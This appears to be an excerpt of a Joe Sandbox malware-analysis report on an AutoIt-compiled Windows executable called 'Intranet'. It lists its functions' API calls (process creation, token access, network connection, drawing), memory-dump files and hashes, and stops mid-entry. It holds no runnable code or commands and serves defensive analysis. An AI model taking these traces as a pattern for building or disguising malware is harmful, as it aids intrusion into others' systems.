                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: cc9b64b9124ba0381161e5d763e0b14ab1bd970da0664cb0dde75e137b2eb44f
                                                                            • Instruction ID: 3e236a4ec666e0e036116992efab0cdabc669ec5c186d160665b89845104f6d0
                                                                            • Opcode Fuzzy Hash: cc9b64b9124ba0381161e5d763e0b14ab1bd970da0664cb0dde75e137b2eb44f
                                                                            • Instruction Fuzzy Hash: 64113031D04A1DDBCF009FA5D998BEDBF78FF18751F014955E940B2280CB309554DB9A
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0052E1EA
                                                                            • #183.OLEAUT32(?,00000002,0000000C), ref: 0052E201
                                                                            • #163.OLEAUT32(0000000C,?,00000000), ref: 0052E216
                                                                            • #442.OLEAUT32(0000000C,?,00000000), ref: 0052E234
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #163#183#442FileModuleName
                                                                            • String ID:
                                                                            • API String ID: 2875472535-0
                                                                            • Opcode ID: 60b6a34073b06b37e5240b465f2877b11e2ad1a7a3b71df52f277c05aa377652
                                                                            • Instruction ID: 30c33ec5e35ee71df55220cd7f6177fcacf589a2cc5fed8fa6d24d9b0150116a
                                                                            • Opcode Fuzzy Hash: 60b6a34073b06b37e5240b465f2877b11e2ad1a7a3b71df52f277c05aa377652
                                                                            • Instruction Fuzzy Hash: 18115EB9205324DBE7308F51ED0AF93BBBCFF01B00F108959A616D6590D7B0E508ABA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction ID: bd9aabe8bc9eba032ba7691e9107165e3f5e2271f355f782f03580f65d8f59bc
                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction Fuzzy Hash: AB01957204818EBBCF125E84CC65CEE3F62BB19344F048557FE1858231E33AC971AB85
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0052B956
                                                                            • ScreenToClient.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0052B96E
                                                                            • ScreenToClient.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0052B992
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0052B9AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: 8c33e3d86443d3d988f25bbbf7623b5bfde41661841533e243463ffbc1749e74
                                                                            • Instruction ID: 59f459f8d8aca562c9dd13025a068f3d78d45f3a68fe16c85c0115425d6037d2
                                                                            • Opcode Fuzzy Hash: 8c33e3d86443d3d988f25bbbf7623b5bfde41661841533e243463ffbc1749e74
                                                                            • Instruction Fuzzy Hash: DA1192B9D00209EFDB01CF98C884AEEBBB8FF18310F008156E914E2250D731AA659F50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0052BCB6
                                                                            • _memset.LIBCMT ref: 0052BCC5
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00568F20,00568F64), ref: 0052BCF4
                                                                            • CloseHandle.KERNEL32 ref: 0052BD06
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3277943733-0
                                                                            • Opcode ID: 6e02431cd50e90b67ccd34420bbcc5b3c02216c2c54b3733fc9ec4da4641c829
                                                                            • Instruction ID: 504d50b9e9d1462d2dcef6a7088e5597419b96a380ceda4be808fb3d2adbaf55
                                                                            • Opcode Fuzzy Hash: 6e02431cd50e90b67ccd34420bbcc5b3c02216c2c54b3733fc9ec4da4641c829
                                                                            • Instruction Fuzzy Hash: 4AF0E9B21003047FF3602B65AC15FB77E5DEB28715F000925FA08D7192DBB54C44A7A8
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 005071A1
                                                                              • Part of subcall function 00507C7F: _memset.LIBCMT ref: 00507CB4
                                                                            • _memmove.LIBCMT ref: 005071C4
                                                                            • _memset.LIBCMT ref: 005071D1
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 005071E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                            • String ID:
                                                                            • API String ID: 48991266-0
                                                                            • Opcode ID: 131898ae575564804cae5a9361ccf3846867051554488a5256db2d703f42fc5f
                                                                            • Instruction ID: c25aa1a205ba67608603f619004b1b6d852b00fddeff5a07b43511822e074f13
                                                                            • Opcode Fuzzy Hash: 131898ae575564804cae5a9361ccf3846867051554488a5256db2d703f42fc5f
                                                                            • Instruction Fuzzy Hash: D6F0303A100104ABCB416F55DC89F4ABB29FF45321F04C055FE085E26AC735E915EBB4
                                                                            APIs
                                                                              • Part of subcall function 004A16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A1729
                                                                              • Part of subcall function 004A16CF: SelectObject.GDI32(?,00000000), ref: 004A1738
                                                                              • Part of subcall function 004A16CF: BeginPath.GDI32(?), ref: 004A174F
                                                                              • Part of subcall function 004A16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 004A1778
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000,00000000,00000000,000000FF,00000002,00000001,?,?,0052C4C0,00000000,?,00000008,00000000), ref: 0052C3E8
                                                                            • LineTo.GDI32(00000000,?,?,?,0052C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0052C3F5
                                                                            • EndPath.GDI32(00000000,?,0052C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0052C405
                                                                            • StrokePath.GDI32(00000000,?,0052C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0052C413
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 5af7c2040e028e98b80353ab8ed14d28c939e50d4e0b52e95582f17ab4a6c2c9
                                                                            • Instruction ID: 24e0eea7d3364b995b62cd07e3ca6aeeebd1be4e7421774489558b45e986586d
                                                                            • Opcode Fuzzy Hash: 5af7c2040e028e98b80353ab8ed14d28c939e50d4e0b52e95582f17ab4a6c2c9
                                                                            • Instruction Fuzzy Hash: ADF0BE31005268BBDF126F54AC0DFCE3F59AF2A315F048000FA11662E283B41969EFE9
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004FAA6F
                                                                            • GetWindowThreadProcessId.USER32(?,00000000,00000000), ref: 004FAA82
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004FAA89
                                                                            • AttachThreadInput.USER32(00000000), ref: 004FAA90
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 5d693a6fd30d58d5dd814fcd9636b3ee2e93a7ba17abca68109ea08a5251f22c
                                                                            • Instruction ID: 676ca08cb36e828f79998316684c7f3039b2e48801ccaa337bf472a07992f0d0
                                                                            • Opcode Fuzzy Hash: 5d693a6fd30d58d5dd814fcd9636b3ee2e93a7ba17abca68109ea08a5251f22c
                                                                            • Instruction Fuzzy Hash: ADE0157194132CBADB215BA29D0DEE73E1CEF257A1F008012B60984190C7758568DBA1
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008,00000000), ref: 004A260D
                                                                            • SetTextColor.GDI32(?,000000FF,00000000), ref: 004A2617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004A262C
                                                                            • GetStockObject.GDI32(00000005), ref: 004A2634
                                                                            • GetWindowDC.USER32(?,00000000), ref: 004DC1C4
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 004DC1D1
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 004DC1EA
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 004DC203
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 004DC223
                                                                            • ReleaseDC.USER32(?,00000000), ref: 004DC22E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: 092aa0fd10298368ef320e8999225f5f778d8c5f23bd984ba7508cfb8c4203e6
• Instruction ID: 3dab0cdca3cb1ceaf552d1b21bfb40b01913d51981dfecb0f03f5f4bdbbc933f
• Opcode Fuzzy Hash: 092aa0fd10298368ef320e8999225f5f778d8c5f23bd984ba7508cfb8c4203e6
• Instruction Fuzzy Hash: B7E06D31504344BBDB225FA8AC59BD93B15EB25332F0483A7FA69482E187B14A84EB15
APIs
• GetCurrentThread.KERNEL32 ref: 004F9339
• OpenThreadToken.ADVAPI32(00000000,?,?,?,004F8F04), ref: 004F9340
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004F8F04), ref: 004F934D
• OpenProcessToken.ADVAPI32(00000000,?,?,?,004F8F04), ref: 004F9354
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 3314c181973d8cee844b2c3739d78b74aaa32b10bce948df620fe9d3f14f9d7c
• Instruction ID: e9d87d89b193b59db1ba015519d88ca62393491d9478ff24981a939805587155
• Opcode Fuzzy Hash: 3314c181973d8cee844b2c3739d78b74aaa32b10bce948df620fe9d3f14f9d7c
• Instruction Fuzzy Hash: B5E086366013119FD7205FF19D0DF573B6CEF64792F104858B745C91D0E6389448DB54
APIs
• GetDesktopWindow.USER32 ref: 004E0679
• GetDC.USER32(00000000), ref: 004E0683
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 004E06A3
• ReleaseDC.USER32(?,?,?,?,?), ref: 004E06C4
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 1478af5d50405a8d875ac72eb977afa1371f6ea9537bea1bb731165c893b341f
• Instruction ID: 171aacff5990dafc6b481508c4dd1d752ec045fdbe6df8f46adf40cef95a6b49
• Opcode Fuzzy Hash: 1478af5d50405a8d875ac72eb977afa1371f6ea9537bea1bb731165c893b341f
• Instruction Fuzzy Hash: FCE09AB0800300EFCB019F70C819B5D7BF5EBAC310F10900AF81AA3390CB788152AF14
APIs
• GetDesktopWindow.USER32 ref: 004E068D
• GetDC.USER32(00000000), ref: 004E0697
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 004E06A3
• ReleaseDC.USER32(?,?,?,?,?), ref: 004E06C4
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 4a5e270a7d4e9f3b28428edb72c64f242bb810a21343efd694f4787dad009cad
• Instruction ID: 6e41f7fd62076efdc2e732b94cdcf377f532f8d6bcad5b3a8a9e7885d9ed51bf
• Opcode Fuzzy Hash: 4a5e270a7d4e9f3b28428edb72c64f242bb810a21343efd694f4787dad009cad
• Instruction Fuzzy Hash: A5E012B5800304AFCB519FB0D819A9DBBF5ABAC314F109009F95AA7390CB789556AF50
APIs
• __getptd_noexit.LIBCMT ref: 004C5FCD
  • Part of subcall function 004C9BF4: GetLastError.KERNEL32(?,004C1003,004C8D5D,004C59C3,?,?,004C1003,?), ref: 004C9BF6
  • Part of subcall function 004C9BF4: __calloc_crt.LIBCMT ref: 004C9C17
  • Part of subcall function 004C9BF4: __initptd.LIBCMT ref: 004C9C39
  • Part of subcall function 004C9BF4: GetCurrentThreadId.KERNEL32 ref: 004C9C40
  • Part of subcall function 004C9BF4: SetLastError.KERNEL32(00000000,004C1003,004C8D5D,004C59C3,?,?,004C1003,?), ref: 004C9C58
• CloseHandle.KERNEL32(?,?,004C5FAC), ref: 004C5FE1
• __freeptd.LIBCMT ref: 004C5FE8
• ExitThread.KERNEL32 ref: 004C5FF0
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
• String ID:
• API String ID: 4169687693-0
• Opcode ID: 51ed754976c184079bca38ece924318bafda823f1dc345b22b0cbd1f860488d7
• Instruction ID: c20801e6839cf2cf71b870d3e9f99a31529dc73168071d8037ca5fb195063471
• Opcode Fuzzy Hash: 51ed754976c184079bca38ece924318bafda823f1dc345b22b0cbd1f860488d7
• Instruction Fuzzy Hash: 45D0A735002F51A7C2B52724AC0DF6E7210AF00B25F04461EF065952F09B68EC428649
APIs
  • Part of subcall function 004B49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,004B27AF,?,00000001), ref: 004B49F4
• _free.LIBCMT ref: 004EFB04
• _free.LIBCMT ref: 004EFB4B
  • Part of subcall function 004B29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 004B2ADF
Strings
• Bad directive syntax error, xrefs: 004EFB33
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: Bad directive syntax error
• API String ID: 2861923089-2118420937
• Opcode ID: 6daed84963ad47ad9ad3027cea7d0993bd1d71289e221cc026fe8c41147bf42e
• Instruction ID: 77fc04167e2ab378b1b96003ecaa0f6fdc8e736657ba9f4e9983f813b316ce64
• Opcode Fuzzy Hash: 6daed84963ad47ad9ad3027cea7d0993bd1d71289e221cc026fe8c41147bf42e
• Instruction Fuzzy Hash: 45919471900259AFCF04EFA6C8519EEB7B4FF05315F10446FF415AB292DB389909CB68
APIs
• OleSetContainedObject.OLE32(?,00000001,?,?,?), ref: 004FC057
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: 8c03a2d357d38d86bdef43fd167373f8a8dd5ec846e63f8c551d2bba0f0e8cfb
• Instruction ID: b6dd893ef04d3f9e087b23d4a33d20304da4712105275c60808be65bc216475a
• Opcode Fuzzy Hash: 8c03a2d357d38d86bdef43fd167373f8a8dd5ec846e63f8c551d2bba0f0e8cfb
• Instruction Fuzzy Hash: 87914974200209EFDB54CF64C984A6ABBE8FF49700F10856EFA4ACB391DB75E845CB65
APIs
  • Part of subcall function 004B436A: _wcscpy.LIBCMT ref: 004B438D
  • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
  • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
• __wcsnicmp.LIBCMT ref: 0050B670
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0050B739
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: e559f2f512341112f646ce6353078509cee75eef85e79ed4530f3d46c478fb05
• Instruction ID: 0edc0eb7aded7b503df2b178781d46478c0caeab247dd97f06bc4c2cdd39a334
• Opcode Fuzzy Hash: e559f2f512341112f646ce6353078509cee75eef85e79ed4530f3d46c478fb05
• Instruction Fuzzy Hash: F0618F75A00219AFDB14DF94C891EAEBBB4FF89710F10805EF946AB391D774AE40CB94
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: _memmove
• String ID: #VK
• API String ID: 4104443479-3366273889
• Opcode ID: 006d6ca2713937da02e4ee624f8004046b7726a1db1cb316732e296da8e57348
• Instruction ID: 3852beda0a8fff6e2feab3035c0113c2c9b79c296bb8bb98dee662ec5f5b1248
• Opcode Fuzzy Hash: 006d6ca2713937da02e4ee624f8004046b7726a1db1cb316732e296da8e57348
• Instruction Fuzzy Hash: 9B51AF70900609DFCF24CFA9C880AEEBBB0FF41315F14456AE85AD7340E738A996CB55
APIs
• Sleep.KERNEL32(00000000), ref: 004AE01E
• GlobalMemoryStatusEx.KERNEL32(?), ref: 004AE037
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: a8d34b159897069b4ccd3619f4c4173942460ae57f36be1fda52af22d4685f89
• Instruction ID: b1b2f0c06b13e0c2905d67ee6daedb3b4185436929a6ce3a187e4680cff3f325
• Opcode Fuzzy Hash: a8d34b159897069b4ccd3619f4c4173942460ae57f36be1fda52af22d4685f89
• Instruction Fuzzy Hash: 935169714087449BE320AF11EC85BAFBBF8FBD5318F41484DF1D981191EBB49428CB1A
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: AU3! ?S$EA06
                                                                            • API String ID: 4104443479-467422127
                                                                            APIs
                                                                              • Part of subcall function 004B4AB2: __fread_nolock.LIBCMT ref: 004B4AD0
                                                                            • _wcscmp.LIBCMT ref: 00509DE1
                                                                            • _wcscmp.LIBCMT ref: 00509DF4
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            APIs
                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?,?,?,?), ref: 00528186
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0052819B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00512C6A
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00512CA0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |
                                                                            • API String ID: 1413715105-2343686810
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 0052713C
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00527178
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 005030B8
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005030F3
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 00514132
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __snwprintf_memmove
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3506404897-2584243854
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?,?,?,Combobox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00526D86
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00526D91
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            APIs
                                                                              • Part of subcall function 004A2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,004A2004), ref: 004A214F
                                                                              • Part of subcall function 004A2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096,?), ref: 004A2163
                                                                              • Part of subcall function 004A2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096), ref: 004A216D
                                                                            • GetWindowRect.USER32(00000000,?,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00527296
                                                                            • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 005272B0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004F032B
